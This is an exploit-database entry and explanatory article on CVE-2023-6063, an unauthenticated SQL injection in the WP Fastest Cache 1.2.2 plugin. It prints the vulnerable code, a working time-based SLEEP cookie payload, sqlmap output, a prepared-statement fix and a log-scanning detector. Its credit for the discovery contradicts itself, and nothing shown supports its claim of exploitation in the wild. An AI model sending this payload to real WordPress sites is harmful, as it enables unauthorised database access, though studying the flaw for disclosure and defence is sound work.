WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection

Exploit Author: Meryem Taşkın
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2024-02-28
# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
 
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
 
## Vuln Code
 
```php
public function is_user_admin(){
    global $wpdb;
    foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
        if(preg_match("/wordpress_logged_in/i", $cookie_key)){
            $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
            break;
        }
    }
    if(isset($username) && $username){
        $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                               FROM `$wpdb->users`
                               INNER JOIN `$wpdb->usermeta`
                               ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username variable is not escaped, vulnerable to SQL injection
                               .....
```
 
## Exploit
```http
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
```
 
## sqlmap output

```text
Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---
```
 
## References
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
 
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın


Unauthenticated SQL Injection in WP Fastest Cache 1.2.2: A Critical Security Flaw Exploited in the Wild

On November 14, 2023, a critical vulnerability was disclosed in WP Fastest Cache 1.2.2, a widely used WordPress plugin that speeds up sites by caching pages. The flaw, tracked as CVE-2023-6063, enables attackers to execute arbitrary SQL queries without authentication, which makes it one of the most dangerous vulnerabilities in the WordPress ecosystem.

Understanding the Vulnerability

The core issue lies in the is_user_admin() function, which attempts to determine whether a user is logged in by parsing the wordpress_logged_in cookie. The function retrieves the username from the cookie value using a regex pattern:


```php
public function is_user_admin(){
    global $wpdb;
    foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
        if(preg_match("/wordpress_logged_in/i", $cookie_key)){
            $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
            break;
        }
    }
    if(isset($username) && $username){
        $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
        FROM `$wpdb->users`
        INNER JOIN `$wpdb->usermeta`
        ON `$wpdb->users`.`user_login` = \"$username\" AND # $username variable is not escaped, vulnerable to SQL injection
        ...
    }
}
```

Here, the $username variable is inserted directly into the SQL query without escaping or sanitization. Because the cookie is read before any session is validated, this opens the door to SQL injection even when the user is not authenticated.

Exploitation: Time-Based Blind SQL Injection

Attackers can exploit this flaw via a simple HTTP request with a malicious cookie. The payload leverages time-based blind SQL injection, a technique that delays the response to confirm whether a query is executed.

Example exploit:


```http
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
```

Decoded, this cookie value becomes:


```text
" AND (SELECT 1 FROM (SELECT(SLEEP(5)))A) AND "1"="1
```

When this cookie is processed, the SQL query becomes:


```sql
SELECT ID, user_login, meta_key, meta_value
FROM wp_users
INNER JOIN wp_usermeta
ON wp_users.user_login = " AND (SELECT 1 FROM (SELECT(SLEEP(5)))A) AND "1"="1
```

The injected condition SLEEP(5) causes the database to pause for five seconds if the query is executed, allowing attackers to detect the vulnerability based on response time.

Impact and Risk Assessment

This vulnerability is particularly dangerous because:

  • Unauthenticated access: No login or session is required to trigger the injection.
  • Blind exploitation: Attackers can infer database behavior without direct output.
  • Escalation potential: remote code execution is not directly possible, but SQL injection can lead to data exfiltration, database manipulation, or chained attacks.
  • High prevalence: WP Fastest Cache is one of the most popular caching plugins, with thousands of installations worldwide.

Even if the attacker cannot extract data directly, the ability to delay queries can be used for fingerprinting, denial-of-service attacks, or probing other vulnerabilities.

Real-World Implications

Consider a scenario where a WordPress site using WP Fastest Cache 1.2.2 is publicly exposed. An attacker could:

  • Send a crafted request with a time-based payload to test if the system is vulnerable.
  • Use the same technique to extract information through boolean-based or error-based injection if the database returns error messages.
  • Chain the vulnerability with other flaws (e.g., file inclusion or remote code execution) to escalate privileges.

Moreover, automated scanners like WPScan can detect this flaw in seconds, making it a prime target for mass exploitation.

Corrected Code and Best Practices

The fix requires proper sanitization of user input. The vulnerable line should use $wpdb->prepare() to escape variables safely:


```php
$res = $wpdb->get_var($wpdb->prepare(
    "SELECT u.ID, u.user_login, um.meta_key, um.meta_value
    FROM $wpdb->users u
    INNER JOIN $wpdb->usermeta um
    ON u.user_login = %s",
    $username
));
```

Using $wpdb->prepare() ensures that the $username value is properly escaped and prevents SQL injection attacks.

Key security principles:

  • Never trust user input, even from cookies.
  • Always use prepared statements in WordPress database queries.
  • Sanitize and validate all data before use.
  • Implement input validation at the earliest stage.

Vendor Response and Mitigation

The vulnerability was reported by Meryem Taşkın and confirmed by Alex Sanford. The vendor, WP Fastest Cache, released a patch in version 1.2.3, which includes the necessary fixes. Site administrators are strongly advised to:

  • Update to WP Fastest Cache 1.2.3 or later.
  • Monitor for signs of exploitation (e.g., unusual database delays or log entries).
  • Use security plugins like WPScan or Sucuri to scan for known vulnerabilities.
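As an added example of the monitoring step (not from the advisory or the vendor), the Python below scans constructed reverse-proxy log lines that record the Cookie header percent-encoded and flags any cookie whose name contains wordpress_logged_in (the same substring test the plugin applies to $_COOKIE keys) but whose decoded value does not have the user|expiry|token|hmac shape of a real WordPress auth cookie. The log format, the sample lines and the username allow-list are assumptions; the second sample line carries the cookie from the request shown earlier.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed log lines in an assumed reverse-proxy format that records the
# Cookie header percent-encoded, as sent on the wire. Not real traffic.
SAMPLE_LOG = """\
2023-11-15T10:00:01Z 198.51.100.7 "GET /wp-admin/ HTTP/1.1" 200 cookie="wordpress_logged_in_7a1=admin%7C1700000000%7CAbC123%7Cdeadbeef; wp-settings-time-1=1699999999"
2023-11-15T10:00:05Z 203.0.113.5 "GET / HTTP/1.1" 200 cookie="wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221"
2023-11-15T10:00:09Z 192.0.2.9 "GET /about/ HTTP/1.1" 200 cookie="PHPSESSID=abc"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\d+) cookie="([^"]*)"$')

# Assumed allow-list for a login name (letters, digits, space, _ . - @), close to
# what WordPress's sanitize_user() keeps in strict mode.
USERNAME_RE = re.compile(r"^[A-Za-z0-9 _.\-@]+$")


def check_logged_in_cookie(decoded: str) -> Optional[str]:
    """Return None for a well-formed user|expiry|token|hmac value, else the reason it is suspect."""
    parts = decoded.split("|")
    if len(parts) != 4:
        return "value is not user|expiry|token|hmac (%d field(s))" % len(parts)
    user, expiry, token, mac = parts
    if not USERNAME_RE.match(user):
        return "username contains characters outside the allow-list"
    if not expiry.isdigit():
        return "expiry is not numeric"
    if not (token and mac):
        return "empty token or hmac"
    return None


def scan_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, client, cookie name, reason) for every suspect login cookie."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, _request, _status, cookie_header = m.groups()
        for pair in cookie_header.split(";"):
            name, _, value = pair.strip().partition("=")
            # Same substring test the plugin applies to $_COOKIE keys.
            if "wordpress_logged_in" not in name.lower():
                continue
            reason = check_logged_in_cookie(unquote(value))
            if reason:
                findings.append((ts, client, name, reason))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("suspect login cookie:", finding)
```

The well-formed cookie on the first line passes, the third line carries no login cookie and is skipped, and the second line is reported because its decoded value has no `|` at all. A shape check like this is a detection aid and a stop-gap at the edge, not a substitute for updating the plugin: it flags requests that could not have come from a genuine WordPress login, which is also a useful signal to correlate with the unusual database delays mentioned above.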

References and Resources

| Resource | Link |
| --- | --- |
| WPScan Blog Post | [Unauthenticated SQL Injection in WP Fastest Cache 1.2.2](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/) |
| WPScan Vulnerability Database | [CVE-2023-6063](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/) |
| CVE Database | [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063) |

Security professionals must remain vigilant: even well-intentioned plugins can introduce critical flaws. Always audit third-party code, keep systems updated, and enforce secure coding practices.